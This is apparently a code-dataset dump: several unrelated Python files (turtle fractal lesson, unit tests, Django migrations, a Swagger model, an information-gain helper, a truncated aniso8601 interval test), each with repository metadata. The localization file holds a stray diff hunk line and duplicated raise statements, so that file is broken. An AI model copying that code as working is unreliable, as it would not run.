| 0
| 376
| 0.199894
| 0
| 0
| 491
| 0.261031
|
42064154fe3a3a9a5966ee89da5b64cd37de9197
| 781
|
py
|
Python
|
CS2/1275_turtle_recursion/2499_koch_snowflake/alternate_snowflake.py
|
nealholt/python_programming_curricula
|
eda4432dab97178b4a5712b160f5b1da74c068cb
|
[
"MIT"
] | 7
|
2020-10-14T03:23:12.000Z
|
2022-03-09T23:16:13.000Z
|
CS2/1275_turtle_recursion/2499_koch_snowflake/alternate_snowflake.py
|
nealholt/python_programming_curricula
|
eda4432dab97178b4a5712b160f5b1da74c068cb
|
[
"MIT"
] | null | null | null |
CS2/1275_turtle_recursion/2499_koch_snowflake/alternate_snowflake.py
|
nealholt/python_programming_curricula
|
eda4432dab97178b4a5712b160f5b1da74c068cb
|
[
"MIT"
] | 11
|
2021-02-21T20:50:56.000Z
|
2022-01-29T07:01:28.000Z
|
import turtle
'''http://www.algorithm.co.il/blogs/computer-science/fractals-in-10-minutes-no-6-turtle-snowflake/
This would be a good introduction to recursion. I don't see how students
would invent this on their own, but they could modify it and see what
other fractals they could generate.
'''
pen = turtle.Turtle()
pen.penup()
pen.goto(-200,0)
pen.pendown()
pen.speed(0)
def fractal(pen, length, depth):
#Base case
if depth == 0:
pen.forward(length)
#Recursive case
else:
fractal(pen, length/3, depth-1)
pen.right(60)
fractal(pen, length/3, depth-1)
pen.left(120)
fractal(pen, length/3, depth-1)
pen.right(60)
fractal(pen, length/3, depth-1)
#Draw the fractal
fractal(pen, 500, 4)
turtle.done()
| 25.193548
| 98
| 0.663252
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 323
| 0.413572
|
4206719b66d7095a812ba8babe145ead4c49882e
| 1,325
|
py
|
Python
|
test/test_edge.py
|
jbschwartz/spatial
|
04dc619ae024ebb4f516cd6483f835421c7d84b1
|
[
"MIT"
] | 1
|
2022-01-02T22:03:09.000Z
|
2022-01-02T22:03:09.000Z
|
test/test_edge.py
|
jbschwartz/spatial
|
04dc619ae024ebb4f516cd6483f835421c7d84b1
|
[
"MIT"
] | null | null | null |
test/test_edge.py
|
jbschwartz/spatial
|
04dc619ae024ebb4f516cd6483f835421c7d84b1
|
[
"MIT"
] | null | null | null |
import unittest
from spatial import Edge, Vector3
class TestEdge(unittest.TestCase):
def setUp(self) -> None:
self.start = Vector3(1, 2, 3)
self.end = Vector3(-1, -2, -3)
self.middle = Vector3(0, 0, 0)
self.edge = Edge(self.start, self.end)
def test__init__accepts_endpoints(self) -> None:
self.assertEqual(self.edge.start, self.start)
self.assertEqual(self.edge.end, self.end)
def test__eq__returns_true_for_edges_regardless_of_direction(self) -> None:
same_edge = Edge(self.start, self.end)
self.assertEqual(self.edge, same_edge)
opposite_edge = Edge(self.end, self.start)
self.assertEqual(self.edge, opposite_edge)
other_edge = Edge(self.start, self.middle)
self.assertNotEqual(other_edge, self.edge)
def test__eq__returns_notimplemented_for_incompatible_types(self) -> None:
self.assertTrue(self.edge.__eq__(2) == NotImplemented)
self.assertTrue(self.edge.__eq__("string") == NotImplemented)
def test_length_returns_the_length_of_the_edge(self) -> None:
self.assertEqual(self.edge.length, (self.start - self.end).length())
def test_vector_returns_the_vector_between_the_edges_endpoints(self) -> None:
self.assertEqual(self.edge.vector, self.end - self.start)
| 36.805556
| 81
| 0.695849
| 1,271
| 0.959245
| 0
| 0
| 0
| 0
| 0
| 0
| 8
| 0.006038
|
4206df5fe7ed10541de178c4f224f75754304f2c
| 324
|
py
|
Python
|
wdae/wdae/user_queries/urls.py
|
iossifovlab/gpf
|
e556243d29666179dbcb72859845b4d6c011af2b
|
[
"MIT"
] | null | null | null |
wdae/wdae/user_queries/urls.py
|
iossifovlab/gpf
|
e556243d29666179dbcb72859845b4d6c011af2b
|
[
"MIT"
] | 82
|
2019-07-22T11:44:23.000Z
|
2022-01-13T15:27:33.000Z
|
wdae/wdae/user_queries/urls.py
|
iossifovlab/gpf
|
e556243d29666179dbcb72859845b4d6c011af2b
|
[
"MIT"
] | null | null | null |
from django.urls import re_path
from user_queries.views import UserQuerySaveView, UserQueryCollectView
urlpatterns = [
re_path(r"^/save/?$", UserQuerySaveView.as_view(), name="user-save-query"),
re_path(
r"^/collect/?$",
UserQueryCollectView.as_view(),
name="user-collect-queries",
),
]
| 27
| 79
| 0.675926
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 66
| 0.203704
|
4207202cb690f62fcf73ad7c61a82a12bebf477d
| 419
|
py
|
Python
|
src/login/migrations/0017_auto_20191006_1716.py
|
vandana0608/Pharmacy-Managament
|
f99bdec11c24027a432858daa19247a21cecc092
|
[
"bzip2-1.0.6"
] | null | null | null |
src/login/migrations/0017_auto_20191006_1716.py
|
vandana0608/Pharmacy-Managament
|
f99bdec11c24027a432858daa19247a21cecc092
|
[
"bzip2-1.0.6"
] | null | null | null |
src/login/migrations/0017_auto_20191006_1716.py
|
vandana0608/Pharmacy-Managament
|
f99bdec11c24027a432858daa19247a21cecc092
|
[
"bzip2-1.0.6"
] | null | null | null |
# Generated by Django 2.0.7 on 2019-10-06 11:46
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('login', '0016_auto_20191006_1715'),
]
operations = [
migrations.AlterField(
model_name='login',
name='logout',
field=models.DateTimeField(default=datetime.datetime.now),
),
]
| 20.95
| 70
| 0.620525
| 310
| 0.739857
| 0
| 0
| 0
| 0
| 0
| 0
| 94
| 0.224344
|
4208848cd73eaf4015f90f42e112e861d94326ec
| 1,846
|
py
|
Python
|
InfoGain.py
|
gsndr/AIDA
|
538caf3ddb5aec8ec8904dc313eb7e31759f5154
|
[
"MIT"
] | 4
|
2021-05-10T11:35:51.000Z
|
2021-12-29T00:56:35.000Z
|
InfoGain.py
|
gsndr/AIDA
|
538caf3ddb5aec8ec8904dc313eb7e31759f5154
|
[
"MIT"
] | null | null | null |
InfoGain.py
|
gsndr/AIDA
|
538caf3ddb5aec8ec8904dc313eb7e31759f5154
|
[
"MIT"
] | 1
|
2021-12-25T13:55:29.000Z
|
2021-12-25T13:55:29.000Z
|
import pandas as pd
from math import log
class InfoGain():
def __init__(self, path):
self._path=path
def extractVariables(self):
self._df = pd.read_csv(self._path + ".csv");
# put the original column names in a python list
'''if 'Unnamed: 0' in self._df.columns:
self._df = self._df.drop(columns=['Unnamed: 0']);
if 'Unnamed: 0.1' in self._df.columns:
self._df = self._df.drop(columns=['Unnamed: 0.1']);
'''
self._categories=list(self._df.columns.values)
print(self._categories)
self._totalRows=self._df.count()
def splitCategories(self):
self._dfNormal=self._df
def entropy(pi):
'''
pi is an array that contain classifications
return the Entropy of a probability distribution:
entropy(p) = − SUM (Pi * log(Pi) )
defintion:
entropy is a metric to measure the uncertainty of a probability distribution.
entropy ranges between 0 to 1
Low entropy means the distribution varies (peaks and valleys).
High entropy means the distribution is uniform.
See:
http://www.cs.csi.cuny.edu/~imberman/ai/Entropy%20and%20Information%20Gain.htm
'''
total = 0
for p in pi:
p = p / sum(pi)
if p != 0:
total += p * log(p, 2)
else:
total += 0
total *= -1
return total
def gain(d, a):
'''
return the information gain:
gain(D, A) = entropy(D)− SUM ( |Di| / |D| * entropy(Di) )
'''
total = 0
for v in a:
total += sum(v) / sum(d) * InfoGain.entropy(v)
gain = InfoGain.entropy(d) - total
return gain
| 29.301587
| 98
| 0.531419
| 1,809
| 0.976255
| 0
| 0
| 0
| 0
| 0
| 0
| 1,006
| 0.542903
|
4208c41522c79409c03ff3e274e65ad419a2c482
| 4,473
|
py
|
Python
|
bot/localization.py
|
Supportiii/telegram-report-bot
|
6a050caafb1c205c0fd58f91be9264f1190ea706
|
[
"MIT"
] | null | null | null |
bot/localization.py
|
Supportiii/telegram-report-bot
|
6a050caafb1c205c0fd58f91be9264f1190ea706
|
[
"MIT"
] | null | null | null |
bot/localization.py
|
Supportiii/telegram-report-bot
|
6a050caafb1c205c0fd58f91be9264f1190ea706
|
[
"MIT"
] | null | null | null |
strings = {
"en": {
"error_no_reply": "This command must be sent as a reply to one's message!",
"error_report_admin": "Whoa! Don't report admins 😈",
"error_restrict_admin": "You cannot restrict an admin.",
"report_date_format": "%d.%m.%Y at %H:%M",
"report_message": '👆 Sent {time} (server time)\n'
'<a href="{msg_url}">Go to message</a>',
"report_note": "\n\nNote: {note}",
"report_sent": "<i>Report sent</i>",
"action_del_msg": "Delete message",
"action_del_and_ban": "Delete and ban",
"action_deleted": "\n\n🗑 <b>Deleted</b>",
"action_deleted_banned": "\n\n🗑❌ <b>Deleted, user banned</b>",
"action_deleted_partially": "Some messages couldn't be found or deleted",
"readonly_forever": "🙊 <i>User set to read-only mode forever</i>",
"readonly_temporary": "🙊 <i>User set to read-only mode until {time} (server time)</i>",
"nomedia_forever": "🖼 <i>User set to text-only mode forever</i>",
"nomedia_temporary": "🖼 <i>User set to text-only mode until {time} (server time)</i>",
"need_admins_attention": 'Dear admins, your presence in chat is needed!\n\n'
'<a href="{msg_url}">Go to chat</a>',
},
"ru": {
"error_no_reply": "Эта команда должна быть ответом на какое-либо сообщение!",
"error_report_admin": "Админов репортишь? Ай-ай-ай 😈",
"error_restrict_admin": "Невозможно ограничить администратора.",
"report_date_format": "%d.%m.%Y в %H:%M",
"report_message": '👆 Отправлено {time} (время серверное)\n'
'<a href="{msg_url}">Перейти к сообщению</a>',
"report_note": "\n\nПримечание: {note}",
"report_sent": "<i>Жалоба отправлена администраторам</i>",
"action_del_msg": "Удалить сообщение",
"action_del_and_ban": "Удалить и забанить",
"action_deleted": "\n\n🗑 <b>Удалено</b>",
"action_deleted_banned": "\n\n🗑❌ <b>Удалено, юзер забанен</b>",
"action_deleted_partially": "Не удалось найти или удалить некоторые сообщения",
"readonly_forever": "🙊 <i>Пользователь переведён в режим «только чтение» навсегда</i>",
"readonly_temporary": "🙊 <i>Пользователь переведён в режим «только чтение» до {time} (время серверное)</i>",
"nomedia_forever": "🖼 <i>Пользователю запрещено отправлять медиафайлы навсегда</i>",
"nomedia_temporary": "🖼 <i>Пользователю запрещено отправлять медиафайлы до {time} (время серверное)</i>",
"need_admins_attention": 'Товарищи админы, в чате нужно ваше присутствие!\n\n'
'<a href="{msg_url}">Перейти к чату</a>',
},
"de": {
"error_no_reply": "Dieser Befehl kann nur als Antwort gesendet werden!",
"error_report_admin": "Whoa! Du kannst Admins nicht melden 😈",
"error_restrict_admin": "Du kannst keine Admins einschränken.",
"report_date_format": "%d.%m.%Y um %H:%M Uhr",
"report_message": '👆 Gesendet {time} (server time)\n'
'<a href="{msg_url}">Zur Nachricht</a>',
"report_note": "\n\nNotiz: {note}",
"report_sent": "<i>Gemeldet</i>",
"action_del_msg": "Nachricht löschen",
"action_del_and_ban": "Löschen und Sperren",
"action_deleted": "\n\n🗑 <b>Löschen</b>",
"action_deleted_banned": "\n\n🗑❌ <b>Gelöscht, Nutzer gesperrt!</b>",
"action_deleted_partially": "Einige Nachrichten wurden nicht gefunden zum löschen",
"readonly_forever": "🙊 <i>Nutzer ist für immer stumm</i>",
"readonly_temporary": "🙊 <i>Nutzer bis {time} stumm. (server time)</i>",
"nomedia_forever": "🖼 <i>Nutzer für immer im Nur-Text-Modus.</i>",
"nomedia_temporary": "🖼 <i>Nutzer bis {time} im nur Text-Modus. (server time)</i>",
"need_admins_attention": 'Liebe Admins, ich sehne euch herbei!\n\n'
'<a href="{msg_url}">Zum Chat</a>',
}
@@ -64,7 +89,7 @@ def get_string(lang: str, key: str):
lang = strings.get(lang)
if not lang:
if not strings.get("en"):
raise KeyError(f'Neither "{lang}" nor "en" locales found')
raise KeyError(f'Weder "{lang}" noch "en" gefunden.')
else:
lang = strings.get("en")
try:
return lang[key]
except KeyError:
return strings.get("en").get(key, "ERR_NO_STRING")
| 47.585106
| 116
| 0.591549
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,915
| 0.766595
|
4209d56bec0f4b46b06778591fc9cb1f2f7511a5
| 3,140
|
py
|
Python
|
swagger_server/models/linecode_r_matrix.py
|
garagonc/simulation-engine
|
c129f0bf601e0d56d924c9e5fa2cf94f7e31a356
|
[
"Apache-2.0"
] | 3
|
2019-06-24T09:02:21.000Z
|
2020-01-30T10:37:46.000Z
|
swagger_server/models/linecode_r_matrix.py
|
linksmart/simulation-engine
|
c129f0bf601e0d56d924c9e5fa2cf94f7e31a356
|
[
"Apache-2.0"
] | null | null | null |
swagger_server/models/linecode_r_matrix.py
|
linksmart/simulation-engine
|
c129f0bf601e0d56d924c9e5fa2cf94f7e31a356
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from swagger_server.models.base_model_ import Model
from swagger_server.models.impedance import Impedance # noqa: F401,E501
from swagger_server import util
class LinecodeRMatrix(Model):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, phase_r: Impedance=None, phase_s: Impedance=None, phase_t: Impedance=None): # noqa: E501
"""LinecodeRMatrix - a model defined in Swagger
:param phase_r: The phase_r of this LinecodeRMatrix. # noqa: E501
:type phase_r: Impedance
:param phase_s: The phase_s of this LinecodeRMatrix. # noqa: E501
:type phase_s: Impedance
:param phase_t: The phase_t of this LinecodeRMatrix. # noqa: E501
:type phase_t: Impedance
"""
self.swagger_types = {
'phase_r': Impedance,
'phase_s': Impedance,
'phase_t': Impedance
}
self.attribute_map = {
'phase_r': 'phase_R',
'phase_s': 'phase_S',
'phase_t': 'phase_T'
}
self._phase_r = phase_r
self._phase_s = phase_s
self._phase_t = phase_t
@classmethod
def from_dict(cls, dikt) -> 'LinecodeRMatrix':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The Linecode_R_Matrix of this LinecodeRMatrix. # noqa: E501
:rtype: LinecodeRMatrix
"""
return util.deserialize_model(dikt, cls)
@property
def phase_r(self) -> Impedance:
"""Gets the phase_r of this LinecodeRMatrix.
:return: The phase_r of this LinecodeRMatrix.
:rtype: Impedance
"""
return self._phase_r
@phase_r.setter
def phase_r(self, phase_r: Impedance):
"""Sets the phase_r of this LinecodeRMatrix.
:param phase_r: The phase_r of this LinecodeRMatrix.
:type phase_r: Impedance
"""
self._phase_r = phase_r
@property
def phase_s(self) -> Impedance:
"""Gets the phase_s of this LinecodeRMatrix.
:return: The phase_s of this LinecodeRMatrix.
:rtype: Impedance
"""
return self._phase_s
@phase_s.setter
def phase_s(self, phase_s: Impedance):
"""Sets the phase_s of this LinecodeRMatrix.
:param phase_s: The phase_s of this LinecodeRMatrix.
:type phase_s: Impedance
"""
self._phase_s = phase_s
@property
def phase_t(self) -> Impedance:
"""Gets the phase_t of this LinecodeRMatrix.
:return: The phase_t of this LinecodeRMatrix.
:rtype: Impedance
"""
return self._phase_t
@phase_t.setter
def phase_t(self, phase_t: Impedance):
"""Sets the phase_t of this LinecodeRMatrix.
:param phase_t: The phase_t of this LinecodeRMatrix.
:type phase_t: Impedance
"""
self._phase_t = phase_t
| 26.610169
| 112
| 0.62293
| 2,828
| 0.900637
| 0
| 0
| 1,742
| 0.554777
| 0
| 0
| 1,743
| 0.555096
|
420b2687d1f426ed1eefef8109dac3c6ae18bab7
| 261
|
py
|
Python
|
workshop/serializers.py
|
shivammaniharsahu/django_api
|
6ffb3d9f70f30f5fd3ae06ec00a6dd7c7783a797
|
[
"bzip2-1.0.6"
] | null | null | null |
workshop/serializers.py
|
shivammaniharsahu/django_api
|
6ffb3d9f70f30f5fd3ae06ec00a6dd7c7783a797
|
[
"bzip2-1.0.6"
] | null | null | null |
workshop/serializers.py
|
shivammaniharsahu/django_api
|
6ffb3d9f70f30f5fd3ae06ec00a6dd7c7783a797
|
[
"bzip2-1.0.6"
] | null | null | null |
from rest_framework import serializers
from .models import Register
class RegisterSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Register
fields = ('id', 'name', 'email', 'contact', 'password', 'confirm_password')
| 29
| 83
| 0.724138
| 190
| 0.727969
| 0
| 0
| 0
| 0
| 0
| 0
| 54
| 0.206897
|
420ceb4ff961d4330b357c01567c2e654e43d336
| 5,303
|
py
|
Python
|
experiments/twitter_event_data_2019/evaluation/groundtruth_processor.py
|
HHansi/WhatsUp
|
87c3eb90570d2f997d8f1abc300a3553f8ef7ca9
|
[
"Apache-2.0"
] | null | null | null |
experiments/twitter_event_data_2019/evaluation/groundtruth_processor.py
|
HHansi/WhatsUp
|
87c3eb90570d2f997d8f1abc300a3553f8ef7ca9
|
[
"Apache-2.0"
] | null | null | null |
experiments/twitter_event_data_2019/evaluation/groundtruth_processor.py
|
HHansi/WhatsUp
|
87c3eb90570d2f997d8f1abc300a3553f8ef7ca9
|
[
"Apache-2.0"
] | null | null | null |
# Created by Hansi at 3/16/2020
import os
from algo.data_process.data_preprocessor import data_cleaning_flow
from algo.utils.file_utils import delete_create_folder
def extract_gt_tokens(text):
"""
Given GT string, method to extract GT labels.
GT string should be formatted as Twitter-Event-Data-2019.
parameters
-----------
:param text: str
:return: list
List of GT labels corresponding to a single event
Since there can be duplicate definitions for a single event, this list contains separate label lists for each
duplicate definition.
"""
duplicates = []
for element in text.split("|"):
labels = []
for subelement in element.split("["):
if subelement:
subelement = subelement.replace("\n", "")
subelement = subelement.replace("]", "")
tokens = subelement.split(",")
labels.append(tokens)
duplicates.append(labels)
return duplicates
def load_gt(folder_path):
"""
Method to read GT data into a dictionary formatted as {time-window: labels}
parameters
-----------
:param folder_path: str
Path to folder which contains GT data
:return: object
Dictionary of GT data
"""
gt = dict()
for root, dirs, files in os.walk(folder_path):
for file in files:
file_name = os.path.splitext(file)[0]
f = open(os.path.join(folder_path, file), 'r', encoding='utf-8')
events = []
for line in f:
tokens = extract_gt_tokens(line)
events.append(tokens)
gt[file_name] = events
f.close()
return gt
def generate_gt_string(tokens):
"""
Given a list of GT labels corresponding to a single event, convert them to a string formatted according to
Twitter-Event-Data-2019 GT format.
parameters
-----------
:param tokens: list
:return: str
"""
str = ""
for duplicate in tokens:
if str and str[-1] == "]":
str = str + "|"
for label in duplicate:
str = str + "["
for element in label:
if str[-1] == "[":
str = str + element
else:
str = str + "," + element
str = str + "]"
return str
def get_combined_gt(gt):
"""
Combine the GT labels of multiple events available at a time frame into single event representation.
parameters
-----------
:param gt: object
Dictionary of GT returned by load_GT
:return: object
Dictionary of combined GT
"""
combined_gt = dict()
for time_frame in gt.keys():
gt_events = gt[time_frame]
combined_gt_event = gt_events[0]
for event in gt_events[1:]:
temp = []
for duplicate in event:
for combined_event in combined_gt_event:
temp.append(combined_event + duplicate)
combined_gt_event = temp
# even though there is 1 event, it is added to a list to preserve consistency with general evaluation_v2 methods
events = [combined_gt_event]
combined_gt[time_frame] = events
return combined_gt
def preprocess_gt(input_filepath, output_filepath):
"""
Preprocess ground truth data in input_file and save to the output_file
parameters
-----------
:param input_filepath: str (.txt file path)
Ground truth file formatted as Twitter-Event-Data-2019
:param output_filepath: str (.txt file path)
:return:
"""
input_file = open(input_filepath, 'r')
output_file = open(output_filepath, 'a', encoding='utf-8')
events = []
for line in input_file:
tokens = extract_gt_tokens(line)
events.append(tokens)
# update tokens
new_events = []
for event in events:
new_duplicates = []
for duplicate in event:
new_labels = []
for label in duplicate:
new_elements = []
for element in label:
new_label = data_cleaning_flow(element)
new_elements.append(new_label)
new_labels.append(new_elements)
new_duplicates.append(new_labels)
new_events.append(new_duplicates)
for event in new_events:
str = generate_gt_string(event)
output_file.write(str)
output_file.write("\n")
output_file.close()
def preprocess_gt_bulk(input_folder_path, output_folder_path):
"""
Preprocess ground truth data in all files in input_folder and save to the output_folder
parameters
-----------
:param input_folder_path: str
Path to folder which contains GT data files
:param output_folder_path: str
Path to folder to save preprocessed GT data
:return:
"""
# delete if there already exist a folder and create new folder
delete_create_folder(output_folder_path)
for root, dirs, files in os.walk(input_folder_path):
for file in files:
input_filepath = os.path.join(input_folder_path, file)
output_filepath = os.path.join(output_folder_path, file)
preprocess_gt(input_filepath, output_filepath)
| 30.302857
| 120
| 0.603998
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,049
| 0.386385
|
420d148bc469105cd3d8585bbbb8f38f1d6ec875
| 2,058
|
py
|
Python
|
metaflow/plugins/env_escape/configurations/test_lib_impl/test_lib.py
|
RobBlumberg/metaflow
|
9f737e6026eee250c1593a2cb1d1c4b19a00adf4
|
[
"Apache-2.0"
] | 5,821
|
2019-12-03T17:57:52.000Z
|
2022-03-31T22:55:12.000Z
|
metaflow/plugins/env_escape/configurations/test_lib_impl/test_lib.py
|
RobBlumberg/metaflow
|
9f737e6026eee250c1593a2cb1d1c4b19a00adf4
|
[
"Apache-2.0"
] | 605
|
2019-12-03T23:09:32.000Z
|
2022-03-31T16:15:05.000Z
|
metaflow/plugins/env_escape/configurations/test_lib_impl/test_lib.py
|
RobBlumberg/metaflow
|
9f737e6026eee250c1593a2cb1d1c4b19a00adf4
|
[
"Apache-2.0"
] | 539
|
2019-12-03T18:25:53.000Z
|
2022-03-29T18:22:33.000Z
|
import functools
class MyBaseException(Exception):
pass
class SomeException(MyBaseException):
pass
class TestClass1(object):
cls_object = 25
def __init__(self, value):
self._value = value
self._value2 = 123
def unsupported_method(self):
pass
def print_value(self):
return self._value
def __str__(self):
return "My str representation is %s" % str(self._value)
def __repr__(self):
return "My repr representation is %s" % str(self._value)
@property
def value(self):
return self._value
@value.setter
def value(self, value):
self._value = value
def to_class2(self, count, stride=1):
return TestClass2(self._value, stride, count)
@staticmethod
def somethingstatic(val):
return val + 42
@classmethod
def somethingclass(cls):
return cls.cls_object
@property
def override_value(self):
return self._value2
@override_value.setter
def override_value(self, value):
self._value2 = value
class TestClass2(object):
def __init__(self, value, stride, count):
self._mylist = [value + stride * i for i in range(count)]
def something(self, val):
return "In Test2 with %s" % val
def __iter__(self):
self._pos = 0
return self
def __next__(self):
if self._pos < len(self._mylist):
self._pos += 1
return self._mylist[self._pos - 1]
raise StopIteration
class TestClass3(object):
def __init__(self):
print("I am Class3")
def thirdfunction(self, val):
print("Got value: %s" % val)
# raise AttributeError("Some weird error")
def raiseSomething(self):
raise SomeException("Something went wrong")
def __hidden(self, name, value):
setattr(self, name, value)
def weird_indirection(self, name):
return functools.partial(self.__hidden, name)
def test_func(*args, **kwargs):
return "In test func"
test_value = 1
| 20.376238
| 65
| 0.623907
| 1,949
| 0.947036
| 0
| 0
| 419
| 0.203596
| 0
| 0
| 183
| 0.088921
|
420d3d5356dc0a6fa2f8ece54ea58e9f77d14058
| 38,124
|
py
|
Python
|
venv/Lib/site-packages/aniso8601/tests/test_interval.py
|
GabrielSilva2y3d/api_atividade-sqlalchemy
|
4a06e37fcb733d4185daf1de6bce415b4de28444
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/aniso8601/tests/test_interval.py
|
GabrielSilva2y3d/api_atividade-sqlalchemy
|
4a06e37fcb733d4185daf1de6bce415b4de28444
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/aniso8601/tests/test_interval.py
|
GabrielSilva2y3d/api_atividade-sqlalchemy
|
4a06e37fcb733d4185daf1de6bce415b4de28444
|
[
"MIT"
] | 1
|
2022-01-13T10:05:55.000Z
|
2022-01-13T10:05:55.000Z
|
# -*- coding: utf-8 -*-
# Copyright (c) 2019, Brandon Nielsen
# All rights reserved.
#
# This software may be modified and distributed under the terms
# of the BSD license. See the LICENSE file for details.
import unittest
import aniso8601
from aniso8601.exceptions import ISOFormatError
from aniso8601.interval import (_parse_interval, parse_interval,
parse_repeating_interval)
from aniso8601.tests.compat import mock
class TestIntervalParserFunctions(unittest.TestCase):
def test_parse_interval(self):
testtuples = (('P1M/1981-04-05T01:01:00',
{'end': (('1981', '04', '05', None, None, None, 'date'),
('01', '01', '00', None, 'time'), 'datetime'),
'duration': (None, '1', None, None, None, None, None,
'duration')}),
('P1M/1981-04-05',
{'end': ('1981', '04', '05', None, None, None, 'date'),
'duration': (None, '1', None, None, None, None, None,
'duration')}),
('P1.5Y/2018-03-06',
{'end': ('2018', '03', '06', None, None, None, 'date'),
'duration': ('1.5', None, None, None, None, None, None,
'duration')}),
('PT1H/2014-11-12',
{'end': ('2014', '11', '12', None, None, None, 'date'),
'duration': (None, None, None, None, '1', None, None,
'duration')}),
('PT4H54M6.5S/2014-11-12',
{'end': ('2014', '11', '12', None, None, None, 'date'),
'duration': (None, None, None, None, '4', '54', '6.5',
'duration')}),
('PT10H/2050-03-01T13:00:00Z',
{'end': (('2050', '03', '01',
None, None, None, 'date'),
('13', '00', '00',
(False, True, None, None,
'Z', 'timezone'), 'time'), 'datetime'),
'duration': (None, None, None,
None, '10', None, None, 'duration')}),
#Make sure we truncate, not round
#https://bitbucket.org/nielsenb/aniso8601/issues/10/sub-microsecond-precision-in-durations-is
('PT0.0000001S/2018-03-06',
{'end': ('2018', '03', '06', None, None, None, 'date'),
'duration': (None, None, None,
None, None, None,
'0.0000001', 'duration')}),
('PT2.0000048S/2018-03-06',
{'end': ('2018', '03', '06', None, None, None, 'date'),
'duration': (None, None, None,
None, None, None,
'2.0000048', 'duration')}),
('1981-04-05T01:01:00/P1M1DT1M',
{'start': (('1981', '04', '05',
None, None, None, 'date'),
('01', '01', '00', None, 'time'),
'datetime'),
'duration': (None, '1', None,
'1', None, '1', None, 'duration')}),
('1981-04-05/P1M1D',
{'start': ('1981', '04', '05',
None, None, None, 'date'),
'duration': (None, '1', None,
'1', None, None, None, 'duration')}),
('2018-03-06/P2.5M',
{'start': ('2018', '03', '06',
None, None, None, 'date'),
'duration': (None, '2.5', None,
None, None, None, None, 'duration')}),
('2014-11-12/PT1H',
{'start': ('2014', '11', '12',
None, None, None, 'date'),
'duration': (None, None, None,
None, '1', None, None, 'duration')}),
('2014-11-12/PT4H54M6.5S',
{'start': ('2014', '11', '12',
None, None, None, 'date'),
'duration': (None, None, None,
None, '4', '54', '6.5', 'duration')}),
('2050-03-01T13:00:00Z/PT10H',
{'start': (('2050', '03', '01',
None, None, None, 'date'),
('13', '00', '00',
(False, True, None, None,
'Z', 'timezone'), 'time'), 'datetime'),
'duration': (None, None, None,
None, '10', None, None, 'duration')}),
#Make sure we truncate, not round
#https://bitbucket.org/nielsenb/aniso8601/issues/10/sub-microsecond-precision-in-durations-is
('2018-03-06/PT0.0000001S',
{'start': ('2018', '03', '06',
None, None, None, 'date'),
'duration': (None, None, None,
None, None, None,
'0.0000001', 'duration')}),
('2018-03-06/PT2.0000048S',
{'start': ('2018', '03', '06',
None, None, None, 'date'),
'duration': (None, None, None,
None, None, None,
'2.0000048', 'duration')}),
('1980-03-05T01:01:00/1981-04-05T01:01:00',
{'start': (('1980', '03', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime'),
'end': (('1981', '04', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime')}),
('1980-03-05T01:01:00/1981-04-05',
{'start': (('1980', '03', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime'),
'end': ('1981', '04', '05',
None, None, None, 'date')}),
('1980-03-05/1981-04-05T01:01:00',
{'start': ('1980', '03', '05',
None, None, None, 'date'),
'end': (('1981', '04', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime')}),
('1980-03-05/1981-04-05',
{'start': ('1980', '03', '05',
None, None, None, 'date'),
'end': ('1981', '04', '05',
None, None, None, 'date')}),
('1981-04-05/1980-03-05',
{'start': ('1981', '04', '05',
None, None, None, 'date'),
'end': ('1980', '03', '05',
None, None, None, 'date')}),
('2050-03-01T13:00:00Z/2050-05-11T15:30:00Z',
{'start': (('2050', '03', '01',
None, None, None, 'date'),
('13', '00', '00',
(False, True, None, None,
'Z', 'timezone'), 'time'), 'datetime'),
'end': (('2050', '05', '11',
None, None, None, 'date'),
('15', '30', '00',
(False, True, None, None,
'Z', 'timezone'), 'time'), 'datetime')}),
#Make sure we truncate, not round
#https://bitbucket.org/nielsenb/aniso8601/issues/10/sub-microsecond-precision-in-durations-is
('1980-03-05T01:01:00.0000001/'
'1981-04-05T14:43:59.9999997',
{'start': (('1980', '03', '05',
None, None, None, 'date'),
('01', '01', '00.0000001',
None, 'time'), 'datetime'),
'end': (('1981', '04', '05',
None, None, None, 'date'),
('14', '43', '59.9999997', None, 'time'),
'datetime')}))
for testtuple in testtuples:
with mock.patch.object(aniso8601.builder.PythonTimeBuilder,
'build_interval') as mockBuildInterval:
mockBuildInterval.return_value = testtuple[1]
result = parse_interval(testtuple[0])
self.assertEqual(result, testtuple[1])
mockBuildInterval.assert_called_once_with(**testtuple[1])
#Test different separators
with mock.patch.object(aniso8601.builder.PythonTimeBuilder,
'build_interval') as mockBuildInterval:
expectedargs = {'start': (('1980', '03', '05', None, None, None,
'date'),
('01', '01', '00', None, 'time'),
'datetime'),
'end':(('1981', '04', '05', None, None, None,
'date'),
('01', '01', '00', None, 'time'),
'datetime')}
mockBuildInterval.return_value = expectedargs
result = parse_interval('1980-03-05T01:01:00--1981-04-05T01:01:00',
intervaldelimiter='--')
self.assertEqual(result, expectedargs)
mockBuildInterval.assert_called_once_with(**expectedargs)
with mock.patch.object(aniso8601.builder.PythonTimeBuilder,
'build_interval') as mockBuildInterval:
expectedargs = {'start': (('1980', '03', '05', None, None, None,
'date'),
('01', '01', '00', None, 'time'),
'datetime'),
'end':(('1981', '04', '05', None, None, None,
'date'),
('01', '01', '00', None, 'time'),
'datetime')}
mockBuildInterval.return_value = expectedargs
result = parse_interval('1980-03-05 01:01:00/1981-04-05 01:01:00',
datetimedelimiter=' ')
self.assertEqual(result, expectedargs)
mockBuildInterval.assert_called_once_with(**expectedargs)
def test_parse_interval_mockbuilder(self):
mockBuilder = mock.Mock()
